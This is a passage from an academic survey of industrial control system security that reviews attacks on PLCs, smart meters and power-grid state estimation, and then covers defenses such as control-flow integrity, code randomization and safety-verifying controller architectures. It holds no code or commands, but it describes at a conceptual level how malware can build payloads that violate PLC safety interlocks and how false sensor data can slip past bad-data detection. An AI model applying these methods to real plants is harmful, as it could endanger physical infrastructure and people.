1) security can be achievedthrough obscurity; 2) blindly deploying security tech-nologies improves security; the naive application offirewalls, cryptography, a nd antivirus software often leaves system operators with a false sense of security;and 3) standards compliance yields a secure system;the North-American Energy Reliability Corporations Cy- ber Infrastructure Protection standards [71] have been criticized for giving a false sense of security [72]. 2) Attacks on PLCs: PLCs monitor and manipulate the state of a physical system. A popular Siemens PLC wasshown to have vulnerabilities. The ISO-TSAP protocolused by these PLCs can implement a replay attack due tolack of proper session freshness [73]. It was also possible to bypass the PLC authentication, sufficient to upload payloads as described in Section III-B, and to execute ar-bitrary commands on the PLC. The Siemens PLCs usedin correctional facilities have vulnerabilities allowing ma-nipulation of cell doors [74]. 3) Attacks on Sensors: Another critical element in an ICS are the sensors that gather data and relay it back to the control units. Consider smart meters that are widely a deployed element of the evolving smart electric grid[75]. A smart meter has the same form factor as a tradi-tional analog electric meter with a number of enhancedfeatures: time of use pricing [76], automated meterreading, power quality monitoring, and remote powerdisconnect. Security assessment of a real-world smartmetering system considered energy theft by tampered measurement values [77]. The system under test allowed for undetectable tampering of measurement values both in the meter s persistent storage, as well as in flight, dueto a replay attack against the meter-to-utility authentica-tion scheme. A follow-up s tudy examined meters from multiple vendors and found vulnerabilities allowing for asingle-packet denial of service attack against an arbitrarymeter, and full control of the remote disconnect switch enabling a targeted disconnect of the service to a customer [78]. B. Emerging Threats Here we introduce two new directions for attacks on ICSs. The first of these constructs payloads targeting anICS that an adversary may not have full access to. The 1046 Proceedings of the IEEE | Vol. 104, No. 5, May 2016McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. second class of attacks manipulate sensor inputs to mis- guide the decisions made by the PLCs. 1) Payload Construction: O n et y p eo fa t t a c k sa i m st o gather intelligence about the victim ICS. For example,the Duqu worm seems to have gathered informationabout victim systems [79], before relaying it to commandand control servers. The other type of attacks against ICSaims to influence the physical behavior of the victim system. Best known example of such an attack is the Stuxnet worm, which manipulated the parameters of aset of centrifuges used for uranium enrichment. Such anattack has two stages: the compromise and the payload.Traditionally, once an adversary has compromised an in-formation system, delivering a preconstructed payload isstraightforward. This is because the attacker usually hasa copy of the software being attacked. However, for ICSs, this is not necessarily the case. Depending on the type of attack the adversary mounts, construction of thepayload may be either error prone or nearly impossible.A payload is either indiscriminate or targeted. An indiscriminate payload performs random attacks causing malicious actions within the machinery of a vic-tim ICS. There are several ways malware can automati-cally construct indiscriminate payloads upon gaining access to one or more of the victim ICS PLCs [80]. The assumption here is that if the malware is able to write tot h eP L Cc o d ea r e a ,t h e ni tm u s ta l s ob ea b l et or e a dfrom the PLCs code area. 1Given the ability to read the PLC code several methods may be used to construct in-discriminate payloads. 1) The malware infers basic safety properties known as interlocks [82] and generates a payload which sequentially violates as many safety prop- erties as possible. 2) The malware identifies the main timing loop in the system. Consider the example of a trafficlight, where the main loop ensures that eachcolor of light is active in sequence for a specificperiod of time. The malware can then constructa payload that violates the timing loop, e.g., by allowing certain lights to overlap. 3) In the bus enumeration technique, the malware uses the standardized identifiers such as Profi-bus IDs to find specific devices within a victimsystem [83]. While these indiscriminate payload construction methods are generic, they have a number of shortcom-ings. First, in the case where the payload is unaware of the actual devices in the victim ICS, one cannot guaran- tee that the resulting payload will cause damage (orachieve any other objective). Second, they cannotguarantee that the resulting payload will be stealthy. Thus, the malicious behavior may be discovered before it becomes problematic. Finally, there is no guarantee thata payload can be constructed at all. If the malware is un-able to infer safety properties, timing loops, or the typesof physical machinery present, then it is not possible toconstruct a payload that exploits them. A targeted payload, on the other hand, attempts to achieve a specific goal within the physical system, such as causing a specific device to operate beyond its safe limits. The alternative is a targeted payload where theadversary is able to arbitrarily inspect the system underattack, i.e., he has a copy of the exploited software. Forautonomous, malware-driven attacks against ICS, this isnot the case. Embedded controllers used in ICS may beair-gapped, meaning that once malware infects them, itmay no longer be able to contact its command and con- trol servers. Additionally, possessing the control logic for a given PLC may not be sufficient to analyze the systemmanually, as the assembly-language-like control logicdoes not reveal which physical devices are controlled bywhich program variables. Malware can construct such atargeted payload against a compromised ICS [84]. Theyassume that the adversary launching the malware has im-perfect knowledge about the physical machinery in the ICS, and is also mostly aware of their interactions. How- ever, the adversary lacks two key pieces of information:1) the complete and precise behavior of the ICS; and2) the mapping between the memory addresses of thevictim PLC and the physical devices in the ICS. Thismapping is important, as often the variable names in aPLC code reveal nothing about the devices theycontrol. Assuming that the attacker can encode his limited knowledge of the victim plant into a temporal logic, aprogram analysis tool called SABOT can analyze the PLCcode, and map behaviors of the memory addresses in thecode to those in the adversary s temporal logic descrip-tion of the system. The results show that by carefullyconstructing the temporal logic description of the sys-t e m ,t h ea d v e r s a r yc a np r o v i d et h em a l w a r ew i t he n o u g h information to construct a targeted payload against most ICS devices. These advances in payload generation defeat one of the main forms of security through obscurity: the inac-cessibility and low-level nature of PLC code. The abilityto generate a payload for a system without ever seeing itscode represents a substantial lowering of the bar for ICSattackers, and thus should be a factor in any assessment methodology. 2) False Data Injection (FDI): In an FDI attack, the ad- versary selects a set of sensors that feed into one ormore controllers. The adversary then supplies carefullycrafted malicious values to these sensors, thus achievinga desired result from the controller. For example, if the 1This assumption was confirmed in a study of PLC security mea- sures placed as an ancillary section in an evaluation of a novel security mechanism [81]. The conclusion was that PLC access control policies are all or nothing, meaning that write access implies read access. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1047McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. supplied malicious values tell the controller that a tem- perature is becoming too low, it will increase the setting on a heating element, even if the actual temperature isfine. This will then lead to undetected overheating. The earliest FDI attack targeted power system state estimation [85]. State estimation is an important step indistributed control systems, where the actual physicalstate is estimated based on a number of observables.Power system state estimation determines how electric load is distributed across various high-voltage lines and substations within the power transmission network.Compromising a subset of phasor measurement units(PMUs) can result in incorrect state estimation. Thiswork addressed two questions: 1) Which sensors shouldbe compromised, and how few are sufficient to achievethe desired result? 2) How can the maliciously craftedsensor values bypass the error correction mechanisms built into the state estimation algorithm? By compromis- ing only tens of sensors (out of hundreds or thousands)it is possible to produce inaccurate state estimations inrealistic power system bus topologies. FDI attacks on Kalman-filtering-based state estima- tion has been reported in [86]. Kalman filters are amore general form of state estimation than the linear,direct current (dc) system model. The susceptibility of a Kalman-filter-based state estimator to FDI attacks de- pends on inherent properties of the designed system[86]. The system is only guaranteed to be controllablevia FDI attack if the underlying state transition matrixcontains an unstable eigenvalue, among other condi-tions. This has important implications not only for at-tacks, but also for defenses against FDI attacks, since asystem lacking an unstable eigenvalue may not be per- fectly attacked. IV.MITIGATING ATTACKS ON ICSs In this section, we review the following ICS defenses: software-based mitigation, secure controller architecturesto detect intrusions, and theoretical frameworks to un-derstand the limits of mitigation. A. Software Mitigations Embedded systems software is programmed using na- tive (unsafe) programming languages such as C or assem-bly language. As a consequence, it suffers from memoryexploits, such as buffer overflows. After gaining controlover the program flow the adversary can inject maliciouscode to be executed (code injection [87]), or use existing pieces (gadgets) that are already residing in program memory (e.g., in linked libraries) to implement the de-sired malicious functionalit y (return-oriented program- ming [88]). Moreover, return-oriented programming isTuring complete, i.e., it allo ws an attacker to execute ar- bitrary malicious code. The latter attacks are often re-ferred to as code-reuse attacks since they use benigncode of existing ICS softwar e. Code-reuse attacks are prevalent and are applicable to a wide range of comput- ing platforms. The Stuxnet is known to have used code-reuse attacks [89]. Defenses against these attacks focus on either the en- forcing control-flow integrity (CFI) or randomizing thememory layout of an application by means of fine-grained code randomization. We elaborate on these twodefenses. These defenses assume an adversary who is able to overwrite control-flow information in the data area of an application. There is a large body of work thatprevents this initial overwrite; a discussion of these ap-proaches is beyond the scope of this paper. 1) Control-Flow Integrity: This defense technique against code-reuse ensures that an application only exe-cutes according to a predetermined control-flow graph (CFG) [90]. Since code injection and return-oriented pro- gramming result in a deviation of the CFG, CFI detectsand prevents the attack. CFI can be realized as a compilerextension [91] or as a binary rewriting module [90]. CFI has performance overhead caused by control- flow validation instructions. To reduce this overhead, anumber of proposals have been made: kBouncer [92],ROPecker [93], CFI for COTS binaries [94], ROPGuard [95], and CCFIR [96]. These schemes enforce so-called coarse-grained integrity checks to improve performance.For instance, they only constrain function returns to in-structions following a call instruction rather than checkingthe return address against a list of valid return addressesheld on a shadow stack. Unfortunately, this tradeoff be-tween security and performance allows for advancedcode-reuse attacks that stitch together gadgets from call- preceded sequences [97] [100]. Some runtime CFI tech- niques leverage low-level hardware events [101] [103].Another host-based CFI check injects intrusion detectionfunctionality into the monitored program [104]. Until now, the majority of research on CFI has focused on software-based solutions. However, hardware-basedCFI approaches are more efficient. Further, dedicatedhardware CFI instructions allow for system-wide CFI pro- tection using these instructions. The first hardware-based CFI approach [105] realized the original CFI proposal[90] as a CFI state machine in a simulation environmentof the Alpha processor. HAFIX proposes hardware-basedCFI instructions and has been implemented on real hard-ware targeting Intel Siskiyou Peak and SPARC [106],[107]. It generates 2% performance overhead acrossdifferent embedded benchmarks by focusing on pre- venting return-oriented programming attacks exploiting function returns. Remaining Challenges : Most proposed CFI defenses focus on the detection and prevention of return-oriented programming attacks, but do not protect againstreturn-into-libc attacks. This is only natural, becausethe majority of code-reuse attacks require a few 1048 Proceedings of the IEEE | Vol. 104, No. 5, May 2016McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. return-oriented gadgets to initialize registers and prepare memory before calling a system call or critical function. However, Schuster et al. [108] have demonstrated that code-reuse attacks based on only calling a chain of vir-tual methods allow arbitrary m alicious program actions. In addition, it has been demonstrated that pure return-into-libc attacks can achieve Turing completeness [109]. Detecting such attacks is challenging: modern programslink to a large number of libraries, and require dangerous API and system calls to operate correctly [97]. Hence, for these programs, dangerous API and system calls arelegitimate control-flow target s for indirect and direct call instructions, even if fine-grained CFI policies are en-forced. In order to detect code-reuse attacks that exploitthese functions, CFI needs to be combined with addi-tional security checks, e.g., dynamic taint analysis andtechniques that perform argum ent validation. Developing such CFI extensions is an important future research direction. 2) Fine-Grained Code Randomization: Aw i d e l yd e - ployed countermeasure against code-reuse attacks is therandomization of the applications memory layout. Thekey idea here is one of software diversity [110]. The keyobservation is that an adversary typically attempts to compromise many systems using the same attack vector. To mitigate this attack, one can diversify a program im-plementation into multiple and different semanticallye q u i v a l e n ti n s t a n c e s[ 1 1 0 ] .T h eg o a li st of o r c et h ea d v e r -sary to tailor the attack vector for each software instance,making the attack prohibitive. Different approaches canbe taken for realizing software diversity, e.g., memoryrandomization [111], [112], based on a compiler [110], [113], [114], or by binary rewriting and instrumentation [115] [118]. A well-known instance of code randomization is ad- dress space layout randomization (ASLR) which random-izes the base address of shared libraries and the mainexecutable [112]. Unfortunately, ASLR is often bypassedin practice due to its low randomization entropy andmemory disclosure attacks which enable prediction of code locations. To tackle this limitation, a number of fine-grained ASLR schemes have been proposed [115] [120]. The underlying idea is to randomize the codestructure, for instance, by shuffling functions, basicblocks, or instructions (ideally for each program run[117], [118]). With fine-grained ASLR enabled, an adver-sary cannot reliably determine the addresses of interest-ing gadgets based on disclosing a single runtime address. However, a recent just-in-time return-oriented pro- gramming (JIT-ROP) attack, circumvents fine-grained ASLR by finding gadgets and generating the return-oriented payload on the fly [121]. As for any other real-world code-reuse attack, it only requires a memorydisclosure of a single runti me address. However, unlike code-reuse attacks against ASLR, JIT-ROP only requiresthe runtime address of a valid code pointer, without knowing to which precise code part or function it points to. Hence, JIT-ROP can use any code pointer such as re-turn addresses on the stack to instantiate the attack.Based on the leaked address, JIT-ROP can disclose thecontent of multiple memory pages, and generates thereturn-oriented payload at runtime. The key insight ofJIT-ROP is that a leaked code pointer will reside on a4-kB aligned memory page. This can be exploited leveraging a scripting engine (e.g., JavaScript) to deter- mine the affected page s start and end address. After-wards, the attacker can start disassembling therandomized code page from its start address, and identifyuseful return-oriented gadgets. To tackle this class of code-reuse attacks, defenses have been proposed [122] [124]. Readactor leverages ahardware-based approach to enable execute-only memory [124]. For this, it exploits Intel s extended page tables to conveniently mark memory pages as nonexecutable. Ina d d i t i o n ,a nL L V M - b a s e di n s t r u m e n t e dc o m p i l e r1 )p e r -mutes function; 2) strictly separates code from data; and3) hides code pointers. As a consequence, a JIT-ROP at-tacker can no longer disassemble a page (i.e., the codepages are set to nonreadable). In addition, one cannotabuse code pointers located on the application s stack and heap to identify return-oriented gadgets, since Read- actor performs code pointer hiding. Remaining Challenges : CFI provides provable security [125]. That is, one can formally verify that CFI enforce-ment is sound. In particular, the explicit control-flowchecks inserted by CFI into an application provide strongassurance that a program s control flow cannot be arbi-trarily hijacked by an adversary. In contrast, code ran- domization does not put any restriction on the program s control flow. In fact, the attacker can provide any validm e m o r ya d d r e s sa sa ni n d i r e c tb r a n c ht a r g e t .A n o t h e rrelated problem of protection schemes based on coderandomization are side-channel attacks [126], [127].These attacks exploit timing and fault analysis sidechannels to infer randomization information. Recently,several defenses started to combine CFI with code ran- domization. For instance, Mohan et al. [128] presented opaque CFI (O-CFI). This solution leverages coarse-grained CFI checks and code randomization to preventreturn-oriented exploits. For this, O-CFI identifies a unique set of possible target addresses for each indi-rect branch instruction. Afterwards, it uses the per-indirect branch set to restrict the target address of theindirect branch to only its minimal and maximal mem- bers. To further reduce the set of possible addresses, it ar- ranges basic blocks belonging to an indirect branch setinto clusters (so that they are located nearby to each other),and also randomizes their location. However, O-CFI re-lies on precise static analysis. In particular, it staticallydetermines valid branch addresses for return instructionswhich typically leads to coarse-grained policies. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1049McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. Nevertheless, Mohan et al. [128] demonstrate that com- bining CFI with code randomization is a promising re- search direction. B. Novel/Secure Control Architectures In this section, we consider mitigations for the prob- lem raised in Section III-B1. The threat here is that anadversary may tamper with a controller s logic code, thussubverting its behavior. This can be generalized to the notion of an untrusted controller. We consider four n o v e la r c h i t e c t u r e sf o rt h i sp r o b l e m :T S V ,at o o lf o rs t a t -ically checking controller code; C 2, a dynamic reference monitor for a running controller; S3A, a controller archi-tecture that represents a middle ground between TSVand C 2; and finally, an approach for providing a trusted computing base (TCB) for a controller so that PLCs maydependably enforce safety properties on themselves. 1) Trusted Safety Verifier (TSV) [81]: As previously dis- cussed, one method for tampering with an ICS process isto upload malicious logic to a PLC. This was demon-strated by the Stuxnet attack. TSV prevents uploadingof malicious control logic by statically verifying thatlogic ap r i o r i [81]. TSV sits on an embedded devices next to a PLC and intercepts all PLC-bound code and statically verifies it agains tas e to fd e s i g n e rs u p p l i e d safety properties. TSV does this in a number of steps.First, the control logic is symbolically executed to pro-duce a symbolic scan cycle. A symbolic scan cycle rep-resents all possible single-scan cycle executions of thecontrol logic. It then finds feasible transitions betweensubsequent symbolic scan cycles to form a temporal exe-cution graph (TEG). The TEG is then fed into a model checker which will verify that a set of linear temporal logic safety properties hold under the TEG model. Ifthe control logic violates any safety property, the modelchecker will return a counterexample input that wouldcause the violation, and the control logic would beblocked from running on the PLC. The main drawbackof TSV is that often the TEG is a tree structure ofbounded depth. Thus, systems beyond a certain com- plexity cannot be effectively checked by TSV in a rea- sonable amount of time. 2)C 2Architecture [129]: It provides a dynamic refer- ence monitor for sequential and hybrid control systems.Like TSV, C 2enforces a set of engineer-supplied safety properties. However, enforcement in C2is done at run- time, by an external module positioned between a PLC a n dt h eI C Sh a r d w a r ed e v i c e s .A tt h ee n do fe a c hP L C scan cycle, a new set of control signals are sent to the ICSdevices. C 2will check these signals, along with the cur- rent ICS state, against the safety properties. Any unsafemodifications of the plant state are denied. If at any step,an attempted control signal is denied by C 2, it will enact one of a number of deny disciplines to deal with thepotentially dangerous operation. One of the main results from C2evaluation was that all deny disciplines should support notifying the PLC of the denial, so that it knowsthe plant did not receive the control signal. A key short-coming of C 2is that it can only detect violations immedi- ately before they occur. What is preferable is a systemthat can give advanced warnings, like in the TSV s staticanalysis, but can work for complex ICS, like C 2. 3) Secure System Simplex Architecture (S3A) [130]: Sim- ilar to how TSV requires a copy of the control logic, S3Arequires the high-level syste m control flow and execution time profiles for the system under observation. Similarto how C 2performs real-time monitoring, S3A aims to detect when the system is approaching an unsafe state.However, different from C 2, S3A aims to give a deter- ministic time buffer before potentially entering the un- safe state [131]. While S3A has the advantage of more advanced detection, it cannot operate on arbitrarily com-plex systems like C 2can. However, it is appropriate for more complex systems than TSV. Remaining Challenges :I nt h i sr e v i e wo fT S V ,C2,a n d S3A, we see a tradeoff forming: complexity of the moni-tored system versus amount of advanced warning. TSVsits at one end of this spectrum, offering the most ad- vanced warning for systems of bounded complexity, while C 2sits at the other end, offering last second detec- tion of unsafe states on arbitrarily complex systems. TheS3A approach represents a compromise between the two,h o w e v e r ,t h em o r ec o m p l e xt h es y s t e mi s ,t h em o r ed e -tailed the control flow and timing information fed toS3A must be, while in the future, computational powerfor verification may be substantial enough to allow for full TSV analysis of arbitrarily complex systems. How- ever, for current, practical solutions, this is not a reason-able assumption. Part of the reason none of the existing architectures can win both ends of the tradeoff is that they all existoutside the PLC. This also adds significant cost and com-plexity, as they must be physically integrated with an ex-isting control system. An alternative approach is to construct future PLCs to provide a minimal trusted com- puting base (TCB). One such TCB with the goal of re-stricting the ability to manipulate physical machinery toa small set of privileged code blocks within the PLCmemory is proposed in [132]. This TCB is not itselfaware of the ICS physical safety properties. Instead, thegoal of this TCB is to protect a privileged set of codeblocks that are able to affect the plant, i.e., via control signals. The privileged cod e blocks then contain the safety properties. Thus, C 2or S3A-like checks are done from within these blocks. This approach has the addedbenefit that a TSV-like verification of safety properties int h ep r i v i l e g e db l o c k si ss u b s t antially simpler than verify- ing an entire system, thus allo wing for a static analysis of more complex system than TSV. 1050 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. C. Detection of Control and Sensor Injection Attacks When considering attacks against ICS, there are two i m p o r t a n tc h a n n e l st h a tm u s tb ec o n s i d e r e d :t h ec o n t r o lchannel and the sensor channel. A control channel attackcompromises a computer, a controller, or individualupstream from the physical process. The compromisedentity then injects malicious commands into the system.A sensor channel attack corrupts sensor readings coming from the physical plant in order to cause bad decision making by the controllers receiving those sensorreadings. 2In this section, we review detection of control channel attacks and FDI. Techniques for control channelattacks inherit from the existing body of work in networkand host intrusion detection, whereas FDI detectionstems largely from the theory of state estimation andcontrol. 1) Detecting Control Channel Attacks: As u r v e yo f SCADA intrusion detection between 2004 and 2008 canb ef o u n di n[ 1 3 3 ] .I tp r e s e n t sat a x o n o m yi nw h i c hd e -tection systems are categorized based on the following. Degree of SCADA specificity: How well does the solution leverage some of the unique aspects ofSCADA systems? Domain: Does the solution apply to any SCADA system, or is it restricted to a single domain, e.g.,water. Detection principle: What method is used to categorize events: behavioral, specification,anomaly, or a combination? Intrusion-specific: Does the solution only address intrusions, or is it also useful for fault detection? Time of detection: Is the threat detected and reported in real time, or only as an offlineoperation? Unit of analysis: Does the solution examine net- work packets, API calls, or other events? We find that among the categorized systems there are some deficiencies. First, they lack a well-defined threatmodel. Second, they do not account for the degree of heterogeneity found in real-world ICS, e.g., use of multi- ple protocols. Finally, the proposed systems were not suf-ficiently evaluated for false positives, and insufficient strategies for dealing with false positives were given. We review recent work that aims at greater feasibility [134]. In this approach, a specification is derived fort r a f f i cb e h a v i o ro v e rs m a r tm e t e rn e t w o r k s ,a n df o r m a lverification is used to ensure that any network trace conforming to the specification will not violate a given security policy. The specification is formed based on:1) the smart meter protocols (in this case, the ANSI C12family); 2) a system model consisting of state machinesthat describe a meter s lifetime, e.g., provisioning,normal operation, error conditions, etc., as well as the network topology; and 3) a set of constraints on allowed behavior. An evaluation of a prototype implementationshowed that no more than 1.6% of CPU usage wasneeded for monitoring the specification at meters. Onepotential limitation of this approach is the need for ex-pert-provided information in the form of the systemmodel and constraints on allowed behavior. An alternative approach, which is not dependent on specifications, is given in [135]. This solution builds a model of good behavior through observation of threetypes of quantities visible to PLCs: sensor measurements,control signals, and events such as alarms. The behavioralmodel uses autoregression to predict the next systemstate. To avoid low-and-slow attacks that autoregressionmay not catch, upper and lower Shewart control limitsare used as absolute bounds on process variables that may not be crossed. Their evaluation on one week of network traces from a prototype control system showed that mostnormal behaviors were properly modeled by the autore-gression. There were, however, several causes of devia-tions including nearly constant signals that occasionallydeviated briefly before returning to their prior constantvalue, and a counter variable that experienced a delayedincrement. Such cases would represent false positives for the autoregression model, but would not necessarily trip the Shewart control limits. 2) Detecting FDI: While control channel attacks di- rectly target controllers with malicious commands, FDIattacks can be more subtle, as they used forged sensordata to cause the controller to make misguided decisions.Detection of FDI attacks is thus deeply rooted in the ex- isting discipline of state estimation discussed earlier. This will require a) a measurement model that relates themeasured quantity to the physical value that caused it,i.e., heat propagation; and b) an error detection methodto allow for faulty measurements to be discarded. We described one attack against power grid state esti- mation in which estimation errors could be caused bytampering with a relatively small number of PMUs [85]. In one approach to detecting such an attack, one can use a small, strategically selected set of tamper-resistantmeters to provide independent measurements [136].These out-of-band measurements are used to determinethe accuracy of the remaining majority of measure-ments contributing to the state estimation. In a second approach [137], two security indices are computed for a given state estimator. The first index measures how well the state estimator s bad data detec- tor can handle attacks where the adversary is limited to afew tampered measurements. The second index measureshow well the bad data detector can handle attacks wherethe adversary only makes small changes to measurementmagnitudes. Along with the grid topology information,these indices can be useful in determining how to 2More information about FDI can be found in Section III-B2. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1051McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. allocate security functionality such as retrofitted encryp- tion to various measurement devices. The third approach differs from the above two in that i td o e sn o ta t t e m p tt os e l e c tas e to fm e t e r sf o rs e c u r i t yenhancements, but instead, places weights on the gridtopology to reflect the trustworthiness of various PMUs[138]. The trust weights are integrated to a distributedKalman filtering algorithm to produce a state estimationthat more accurately reflects the trustworthiness of the individual PMUs. In the evaluation of the distributed Kalman filters, it was found that they converged to thecorrect state estimate in approximately 20 steps. From these approaches to detecting both control channel and FDI attacks, one can see that an effectivemethod toward detecting ICS intrusions involves moni-toring the physical process itself, as well as its interac-tions with the controller and sensors. D. Theoretical ICS Security Frameworks A number of recent advances have generalized the in- creasing body of results to provide theoretical frame-works. In this section, we will review such theoreticalframeworks based on the following three approaches:1) modeling attacker behavior and identifying likely at-tack scenarios; 2) defining the general detection and identification of attacks against ICS; and 3) the distri- bution of security enhancements in ICSs where con-trollers share network infrastructure. A common themein these frameworks is the optimal distribution of secu-rity protections in large, legacy ICSs. Adding protections like cryptographic communica- tions to legacy equipment is expensive. Thus, it is prefer-able to secure the most vulnerable portions of an ICS. Teixeira et al. describe a risk management framework for ICSs [139]. Starting with the notion of security indices[137], this work looks at methods for identifying themost vulnerable measurements in both static and dy-namic control systems. For static control systems, it isassumed that adversaries wish to execute the minimumcost attack. In the static case, the /C11 kindex described in Section IV-C is sufficient, and methods are given for effi- ciently computing /C11kfor large systems. In the case of dynamic systems, the maximum- impact, minimum-resource attacks are defined as a mul-tiobjective optimization problem. For such a problem,the basic security indices do not suffice. Instead, themultiobjective problem is transformed into a maximum-impact, resource-constrained problem. An example isgiven where this is used to calculate the attack vectors for a quadruple-tank system. The resulting, optimal attack strategy can be used to allocate defenses such as dataencryption in the ICS. Another framework considers generalizing attacks against ICSs and describe the fundamental limitations ofmonitors against these attacks [140]. Assuming that an at-t a c km o n i t o ri sc o n s i s t e n t ,i . e . ,d o e sn o tg e n e r a t ef a l s epositives, it is shown that some attacks are undetectable if there is an initial state which produces the same final state as an attack. Additionally, it is shown that some at-tacks cannot be distinguished from others. These resultsare applicable to stealthy [141], replay [142], and FDIattacks. The previous two approaches considered ways of modeling attacks and attack likelihoods against individualcontrol loops. However, in some systems, a number of otherwise independent control process are actually some- what dependent due to the shared network. In this case,a distributed denial of service (DDoS) attack against onecontroller may affect others. The problem of interdepen-dent control systems using a game-theoretic approach isaddressed in [143]. The noncooperative game consists oftwo stages: 1) each control loop (player) chooses whetherto apply security enhancements; and 2) each player ap- plies the optimal control input to its plant. In the nonsocial form of this game, players only at- tempt to minimize their own cost, which consists of theoperating costs of the plant plus the cost of adding andmaintaining security measures. For this form of thegame, with M-players, there is shown to exist a unique equilibrium solution. The solutions to this game may notbe globally optimal, due to externalities imposed by players that opt-out of security enhancements. To solve this, penalties are introduced for players that do not se-lect security enhancements leading to a guaranteed un- ique solution that is also globally optimal. While such agame-theoretic approach is useful in distributing the costof security enhancements, actually achieving robust con-trol in distributed systems is more difficult, especiallywhen the system in question is nonlinear. To this end, a modification to a traditional model-predicative control (MPC) problem has been suggested [144]. Adding a ro-bustness constraint to the MPC problem can bound thevalues of future states. These theoretical frameworks offer opportunities to understand and improve defenses. However, it is impor-tant to understand the assumptions behind the frame-works. For example, the above approaches assume the following. 1) Attackers are omniscient, knowing the exact measurement, control, and process matrices foreach system, as well as all system states. 2) Attackers are nearly omnipotent, with the ability to compromise any measurement and controlvector. There is an important exception here,which is that detectors are assumed to be im- mune to attackers. 3) Detectors do not create false positives and sys- tems are completely deterministic (first twoapproaches). 4) Security enhancements can significantly mitigate DDoS attacks on various network architectures(third approach). 1052 Proceedings of the IEEE | Vol. 104, No. 5, May 2016McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. In any assessment procedure, the actual set of assump- tions should be considered and compared with those of the theoretical framework being used in the assessment. V.CONCLUSION ICT-based ICS can deliver real-time information, result- ing in automatic and intelligent control of industrialprocesses. Inherently dangerous processes, however, are no longer immune to cyber threats, as vulnerable de- vices, formats, and protocols are not hosted on dedicatedinfrastructure due to cost pressures. Consequently, ICSinfrastructure has become increasingly exposed, either bydirect connection to the Internet, or via interfaces toutility IT systems. Therefore, inflicting substantial dam-age or widespread disruption may be possible with acomprehensive analysis of the target systems. Publicly available information, combined with default and well-known ICS configuration details, could potentiallyallow a resource-rich adversary to mount a large-scaleattack. This paper surveyed the state of the art in ICS secu- r i t y ,i d e n t i f i e do u t s t a n d i n g research challenges in thisemerging area, and motivated the deployment of cyber- security methods and tools to ICS. All levels of the multi- layered ICS architecture can be targeted by sophisticatedcyberattacks and disturb the control process of the ICS.Assessing the vulnerabilities of ICS requires the develop- ment of a uniquely-ICS multilayered testbed that estab-lishes as many pathways as possible between the cyberand physical components in the ICS. These pathwayscan assist in determining the real-world consequences in terms of the technical impacts and the severity of the outcomes. An important direction of research isto develop effective methods to detect ICS intrusionsthat involve monitoring the physical processes them-s e l v e s ,a sw e l la st h e i ri n t e r actions with the controller and sensors. h Acknowledgment The authors from New York University (NYU) would l i k et ot h a n kS .L e e ,P .R o b i s o n ,P .S t e r g i o u ,a n dS .K i mfrom Consolidated Edison for their continuous supporton the project, Platform Profiling in Legacy and ModernControl and Monitoring Systems. REFERENCES [1] K. Stouffer, J. Falco, and K. Scarfone, Guide to industrial control systems (ICS) security, NIST Special Publication 800-82, 2011. [Online]. Available: http://csrc.nist. gov/publications/nistpubs/800-82/ SP800-82-final.pdf. [2] E. Hayden, M. Assante, and T. Conway, An abbreviated history of automation & industrial controls systems andcybersecurity, 2014. [Online]. Available: https://ics.sans.org/media/An-Abbreviated- History-of-Automation-and-ICS- Cybersecurity.pdf. [3] European Network and Information Security Agency (ENISA), Protecting industrial control systems Recommendations for Europe and member states, 2011. [Online]. Available: https:// www.enisa.europa.eu/. [4] T. M. Chen and S. Abu-Nimeh, Lessons from Stuxnet, Computer , vol. 44, no. 4, pp. 91 93, 2011. [5] P. Muncaster, Stuxnet-like attacks beckon as 50 new SCADA threats discovered, 2011. [Online]. Available: http://www.v3. co.uk/v3-uk/news/2045556/stuxnet-attacks- beckon-scada-threats-discovered. [6] J. Weiss, Assuring industrial control system (ICS) cyber security, [Online]. Available: http://csis.org/files/media/csis/ pubs/080825_cyber.pdf. [7] R. Anderson et al. , Measuring the cost of cybercrime, in The Economics of Information Security and Privacy . Berlin, Germany: Springer-Verlag, 2013,pp. 265 300. [8] Willis Group, Energy market review 2014 Cyber-attacks: Can the market respond? 2014. [Online]. Available: http://www.willis.com/.[9] Y. Mo et al. , Cyber-physical security of a smart grid infrastructure, Proc. IEEE , vol. 100, no. 1, pp. 195 209, Jan. 2012. [10] P. Radmand, A. Talevski, S. Petersen, and S. Carlsen, Taxonomy of wireless sensor network cyber security attacks in the oil and gas industries, in Proc. 24th Int. Conf. Adv. Inf. Netw. Appl. , 2010, pp. 949 957. [11] S. Amin, X. Litrico, S. Sastry, and A. M. Bayen, Cyber security of waterSCADA systems Part I: Analysis and experimentation of stealthy deception attacks, IEEE Trans. Control Syst. Technol. , vol. 21, no. 5, pp. 1963 1970, 2013. [12] What is a programmable logic controller (PLC)? [Online]. Available: http://www. wisegeek.org/what-is-a-programmable- logic-controller.htm. [13] A. Scott, What is a distributed control system (DCS)? [Online]. Available:http://blog.cimation.com/blog/bid/198186/ What-is-a-Distributed-Control-System-DCS. [14] Kaspersky, Cyperthreats to ICS systems, 2014. [Online]. Available: http://media. kaspersky.com/en/business-security/ critical-infrastructure-protection/ 